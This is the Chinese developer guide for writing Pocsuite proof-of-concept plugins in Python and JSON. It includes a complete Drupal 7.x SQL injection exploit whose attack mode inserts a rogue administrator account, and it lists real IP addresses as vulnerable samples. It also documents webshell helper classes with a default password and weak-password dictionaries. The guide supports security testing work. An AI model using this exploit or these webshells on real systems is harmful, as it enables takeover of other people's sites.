Skip to content

Latest commit

 

History

History
591 lines (486 loc) · 21.7 KB

POCAPI.md

File metadata and controls

591 lines (486 loc) · 21.7 KB
                              ,--. ,--.         
 ,---. ,---. ,---.,---.,--.,--`--,-'  '-.,---.  
| .-. | .-. | .--(  .-'|  ||  ,--'-.  .-| .-. : 
| '-' ' '-' \ `--.-'  `'  ''  |  | |  | \   --. 
|  |-' `---' `---`----' `----'`--' `--'  `----'  
`--'                            http://sebug.net

POC编写说明


PoC py脚本编写步骤:

本小节介绍POC python脚本编写

  1. 首先新建一个.py文件,文件名应当符合 poc命名规范 :

  2. 编写POC实现类TestPOC,继承自POCBase类.

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    from pocsuite.net import req
    from pocsuite.poc import Output, POCBase
    from pocsuite.utils import register
    
    class TestPOC(POCBase):
        ...
    
    
  3. 填写POC信息字段,所有信息都要认真填写不然不会过审核的

    vulID = '1571'  # vul ID
    version = '1' #默认为1
    author = 'zhengdt' # POC作者的大名
    vulDate = '2014-10-16' #漏洞公开的时间,不知道就写今天
    createDate = '2014-10-16'# 编写POC的日期
    updateDate = '2014-10-16'#POC更新的时间,默认和编写时间一样
    references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']# 漏洞地址来源,0day不用写
    name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC'# POC 名称
    appPowerLink = 'https://www.drupal.org/'# 漏洞厂商主页地址
    appName = 'Drupal'# 漏洞应用名称
    appVersion = '7.x'# 漏洞影响版本
    vulType = 'SQL Injection'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Drupal 在处理 IN 语句时,展开数组时 key 带入 SQL 语句导致 SQL 注入,
        可以添加管理员、造成信息泄露。
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用POC测试成功的网站
    
  4. 编写POC检测代码

    def _verify(self):
        output = Output(self)
        result = {} #result是返回结果
        # 验证代码
    
    返回结果result中的key值必须按照下面的规范来写:
    'Result':{
       'DBInfo' :   {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx' , 'Uid':'xxx' , 'Groupid':'xxx'},
       'ShellInfo': {'URL': 'xxx', 'Content': 'xxx' },
       'FileInfo':  {'Filename':'xxx','Content':'xxx'},
       'XSSInfo':   {'URL':'xxx','Payload':'xxx'},
       'AdminInfo': {'Uid':'xxx' , 'Username':'xxx' , 'Password':'xxx' }
       'Database':  {'Hostname':'xxx', 'Username':'xxx',  'Password':'xxx', 'DBname':'xxx'},
       'VerifyInfo':{'URL': 'xxx' , 'Postdata':'xxx' , 'Path':'xxx'}
       'SiteAttr':  {'Process':'xxx'}
    }
    

    result各字段意义请参见附录

  5. 编写攻击模式:

    攻击模式可以对目标进行getshell,查询管理员帐号密码等操作.定义它的方法与检测模式类似

    def _attack(self):
        output = Output(self)
        result = {}
        # 攻击代码
    

    和验证模式一样,攻击成功后需要把攻击得到结果赋值给result变量。

    注意:如果该POC没有攻击模式,可以在 _attack()函数下加入一句 return self._verify() 这样你就无需再写 _attack 函数了。

  6. 注册POC实现类

    在类的外部调用register()方法注册poc类

    Class TestPOC(POCBase):
        #POC内部代码
    
    #注册TestPOC类
    register(TestPOC)
    

PoC json脚本编写步骤:

  1. 首先新建一个.json文件,文件名应当符合 poc命名规范

  2. poc json有两个key,pocInfo和pocExecute,分别代表poc信息部分执行体。

{ "pocInfo":{}, "pocExecute":{} } ```

  1. 填写pocInfo部分:

{ "pocInfo":{ "vulID": "poc-2015-0107", "name": "Openssl 1.0.1 内存读取 信息泄露漏洞", "protocol": "http", "author": "test", "references": ["http://drops.wooyun.org/papers/1381"], "appName": "OpenSSL", "appVersion" : "1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1", "vulType": "Information Disclosure", "desc" :"OpenSSL是一个强大的安全套接字层密码库。这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据.", "samples": ["http://www.baidu.com", "http://www.qq.com"] }, "pocExecute":{} }
``` 各字段的含义与python属性部分相同。

  1. 填写pocExecute部分: pocExecute分为verify和attack两部分

{ "pocInfo":{}, "pocExecute":{ "verify":[], "attack":[] } } **填写verify部分:** { "pocInfo":{}, "pocExecute":{ "verify":[ { "step": "1", "method": "get", "vulPath": "/api.php", "params": "test=123&sebug=1234", "necessary": "", "headers": {"cookie": "123"}, "res": { "raw": ["baidu","google"], "time": "time" } }, { "step": "2", "method": "get", "vulPath": "/api.php", "params": "test=sebug", "necessary": "", "headers": "", "res":{ "raw": [], "time": "0.01" } } ], "attack":[] } } ``` >说明:

>step: 按照上下顺序执行,值可以取0和非0两种。如果step的值为0,那么验证成功后就会返回成功,如果step的值不为0,那么需要全部满足后才返回成功。

> method:请求方式

> vulPath:请求路径

> params:请求参数

> necessary:请求中必须存在的数据,例如cookie

> headers:自定义请求头部

> res:返回体,其中:

> > raw:表示字符串匹配,为数组类型,当且仅当raw中所有的元素都匹配成功的情况下,返回True,否则返回False.

> > time:为时间差

> > 当raw和time同时存在时,取raw,time失效。

**verify中每个元素代表一个请求。**

填写attack部分: attack部分和verify部分类似,不再缀述。

附录:


POC py代码示例

Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC:

#!/usr/bin/env python
# coding: utf-8
import urllib
import random
import string
from collections import OrderedDict

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1571'  # vul ID
    version = '1'
    author = 'zhengdt'
    vulDate = '2014-10-16'
    createDate = '2014-10-16'
    updateDate = '2014-10-16'
    references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']
    name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC'
    appPowerLink = 'https://www.drupal.org/'
    appName = 'Drupal'
    appVersion = '7.x'
    vulType = 'SQL Injection'
    desc = '''
        Drupal 在处理 IN 语句时,展开数组时 key 带入 SQL 语句导致 SQL 注入,
        可以添加管理员、造成信息泄露。
    '''

    samples = ['http://216.119.147.168/', 'http://69.172.67.176/']

    def _attack(self):
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        uid = int(random.random() * 1000)
        username = ''.join(random.sample(string.letters+string.digits, 5))
        payload = OrderedDict()

        if not self._verify(verify=False):
            return self.parse_attack(result)

        payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
                '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
                'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
                 = 'test'
        payload['name[0]'] = 'test2'
        payload['pass'] = 'test'
        payload['form_id'] = 'user_login_block'

        #print urllib.urlencode(payload)
        response = req.post(vul_url, data=payload)
        if response.status_code == 200:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = username
            result['AdminInfo']['Password'] = 'thanks'

        return self.parse_attack(result)

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/?q=node&destination=node' % self.url
        payload = {
            'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
                '135)),floor(rand(0)*2))x from  information_schema.tables group by x' \
                ')a);;#]': 'test',
            'name[0]': 'test2',
            'pass': 'test',
            'form_id': 'user_login_block',
        }

        response = req.post(vul_url, data=payload).content
        if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = urllib.urlencode(payload)

        return self.parse_attack(result) if verify else 'e4f5fd37a92eb41ba575c81bf0d31591' in response

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)

POC json代码示例

{
    "pocInfo": {
        "vulID": "poc-2015-0107",
        "name": "Openssl 1.0.1 内存读取 信息泄露漏洞",
        "protocol": "http",
        "author": "test",
        "references": ["http://drops.wooyun.org/papers/1381"],
        "appName": "OpenSSL",
        "appVersion" : "1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1",
        "vulType": "Information Disclosure",
        "desc" :"OpenSSL是一个强大的安全套接字层密码库。这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据.",
        "samples": ["http://www.baidu.com", "http://www.qq.com"]
    },

    "pocExecute":{
        "verify": [
            {
                "step": "1",
                "method": "get",
                "vulPath": "/api.php",
                "params": "test=123&shit=1234",
                "necessary": "",
                "headers": {"cookie": "123"},
                "res": {
                    "raw": ["baidu"],
                    "time": "time"
                }
            },
            {
                "step": "2",
                "method": "get",
                "vulPath": "/api.php",
                "params": "test=shit",
                "necessary": "",
                "headers": "",
                "res":{
                    "raw": [],
                    "time": "0.01"
                }
            }
        ],
        "attack": [
            {
                "step": "0",
                "method": "get",
                "vulPath": "/api.php",
                "params": "test=attack",
                "necessary": "",
                "headers": "shit",
                "res":{
                    "raw": [],
                    "time": ""
                }
            },
            {
                "step": "0",
                "method": "get",
                "vulPath": "/api.php",
                "params": "test=attack",
                "necessary": "",
                "headers": "shit",
                "res":{
                    "raw": [],
                    "time": ""
                }
            }
        ]
    }
}

poc命名规范

PoC 命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名种的所有字母改成成小写,所有的符号改成_.
文件名不能有特殊字符和大写字母 最后出来的文件名应该像这样 
```
_1847_seeyon_3_1_login_info_disclosure.py
```

result各key对应的含义:

correspond:[

    {  name: 'DBInfo',        value:'数据库内容' },
    {  name: 'Username',      value: '管理员用户名'},
    {  name: 'Password',      value:'管理员密码' },
    {  name: 'Salt',          value: '加密盐值'},
    {  name: 'Uid',           value: '用户ID'},
    {  name: 'Groupid',       value: '用户组ID'},

    {  name: 'ShellInfo',     value: 'Webshell信息'},
    {  name: 'URL',           value: 'Webshell地址'},
    {  name: 'Content',       value: 'Webshell内容'},

    {  name: 'FileInfo',      value: '文件信息'},
    {  name: 'Filename',      value: '文件名称'},
    {  name: 'Content',       value: '文件内容'},

    {  name: 'XSSInfo',       value: '跨站脚本信息'},
    {  name: 'URL',           value: '验证URL'},
    {  name: 'Payload',       value: '验证Payload'},

    {  name: 'AdminInfo',     value: '管理员信息'},
    {  name: 'Uid',           value: '管理员ID'},
    {  name: 'Username',      value: '管理员用户名'},
    {  name: 'Password',      value: '管理员密码'},

    {  name: 'Database',      value:'数据库信息' },
    {  name: 'Hostname',      value: '数据库主机名'},
    {  name: 'Username',      value:'数据库用户名' },
    {  name: 'Password',      value: '数据库密码'},
    {  name: 'DBname',        value: '数据库名'},

    {  name: 'VerifyInfo',    value: '验证信息'},
    {  name: 'URL',           value: '验证URL'},
    {  name: 'Postdata',      value: '验证POST数据'},
    {  name: 'Path',          value: '网站绝对路径'},

    {  name: 'SiteAttr',      value: '网站服务器信息'},
    {  name: 'Process',       value: '服务器进程'}

    ]
    

漏洞类型规范

英文名称中文名称缩写
Cross Site Scripting 跨站脚本 xss
Cross Site Request Forgery 跨站请求伪造 csrf
SQL Injection Sql注入 sql-inj
LDAP Injection ldap注入 ldap-inj
Mail Command Injection 邮件命令注入 smtp-inj
Null Byte Injection 空字节注入 null-byte-inj
CRLF Injection CRLF注入 crlf-inj
SSI Injection Ssi注入 ssi-inj
XPath Injection Xpath注入 xpath-inj
XML Injection Xml注入 xml-inj
XQuery Injection Xquery 注入 xquery-inj
Command Execution 命令执行 cmd-exec
Code Execution 代码执行 code-exec
Remote File Inclusion 远程文件包含 rfi
Local File Inclusion 本地文件包含 lfi
Abuse of Functionality 功能函数滥用 func-abuse
Brute Force 暴力破解 brute-force
Buffer Overflow 缓冲区溢出 buffer-overflow
Content Spoofing 内容欺骗 spoofing
Credential Prediction 证书预测 credential-prediction
Session Prediction 会话预测 session-prediction
Denial of Service 拒绝服务 dos
Fingerprinting 指纹识别 finger
Format String 格式化字符串 format-string
HTTP Response Smuggling http响应伪造 http-response-smuggling
HTTP Response Splitting http响应拆分 http-response-splitting
HTTP Request Splitting http请求拆分 http-request-splitting
HTTP Request Smuggling http请求伪造 http-request-smuggling
HTTP Parameter Pollution http参数污染 hpp
Integer Overflows 整数溢出 int-overflow
Predictable Resource Location 可预测资源定位 res-location
Session Fixation 会话固定 session-fixation
URL Redirector Abuse url重定向 redirect
Privilege Escalation 权限提升 privilege-escalation
Resolve Error 解析错误 resolve-error
Arbitrary File Creation 任意文件创建 file-creation
Arbitrary File Download 任意文件下载 file-download
Arbitrary File Deletion 任意文件删除 file-deletion
Backup File Found 备份文件发现 bak-file-found
Database Found 数据库发现 db-found
Directory Listing 目录遍历 dir-listing
Directory Traversal 目录穿越 dir-traversal
File Upload 文件上传 file-upload
Login Bypass 登录绕过 login-bypass
Weak Password 弱密码 weak-pass
Remote Password Change 远程密码修改 remote-pass-change
Code Disclosure 代码泄漏 code-disclosure
Path Disclosure 路径泄漏 path-disclosure
Information Disclosure 信息泄漏 info-disclosure
Security Mode Bypass 安全模式绕过 sec-bypass
Malware 挂马 mal
Black Link 暗链 black-link
Backdoor 后门 backdoor

也可以参见漏洞类型规范

WebShell类

pocsuite提供两个类来快速生成WebShell。具体代码见:lib/utils/webshell.py

WebShell类:

class Webshell:
    #基础Webshell类
    # @pwd :    Webshell密码 
    # @content: Webshell代码
    # @check:   检验代码
    # @keyword: 检验特征关键字
    __init__(self, pwd='', content='', check='', keyword='')
    
    set_pwd(self, pwd)#设置webshell密码
    get_pwd(self)     #获取webshell密码
    get_content(self) #获取webshell代码
    check(self, url)  #校验执行结果
        

VerifyShell类:

class VerifyShell(Webshell):

    def __init__(self, content='', keyword=''):
        Webshell.__init__(self, content=content, keyword=keyword)
        self._check_data = {}

pocsuite中封装了常用的一句话WebShell,默认密码均为cmd。如果需要在页面中直接调用webshell,需要引入webshell类。 如:使用PhpShell类

from lib.utils.webshell import PhpShell

如果需要自定义WebShell,可以继承WebShell类。 如果需要自定义VerifyShell,可以继承VerifyShell类。

弱口令相关

引入API:

from lib.utils.password import *

相关API:

#默认返回top前100弱口令
getWeakPassword()
#默认返回top前1000弱口令
getLargeWeakPassword()
#生成密码字典
genPassword(length=8, chars=string.letters+string.digits)

相关的密码文件在 pocsuite/data 目录下,如果需要修改字典位置,可以修改paths.WEAK_PASS属性和paths.LARGE_WEAK_PASS 属性值。

PoC 编写注意事项

  1. 检测模式为了防止误报的产生,我们一般使用的让页面输出一个自定义的字符串。

    比如:

    检测 SQL 注入时,select md5(0x2333333)

     if '5e2e9b556d77c86ab48075a94740b6f7' in content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url+payload
    

    检测 XSS 漏洞时alert('<0x2333333>')

     if '<0x2333333>' in content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url+payload
    

    检测 PHP 文件上传是否成功。

     if '5e2e9b556d77c86ab48075a94740b6f7' in content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url+payload
    
  2. 任意文件如果需要知道网站路径才能读取文件的话,可以读取系统文件进行验证,要写 Windows 版和 Linux 版两个版本。

  3. 检测模式下,上传的文件一定要删掉

  4. 程序可以通过某些方法获取表前缀,just do it;若不行,保持默认表前缀

  5. PoC 编写好后,务必进行测试,测试规则为:5个不受漏洞的网站,确保 PoC 攻击不成功;5个受漏洞影响的网站,确保 PoC 攻击成功。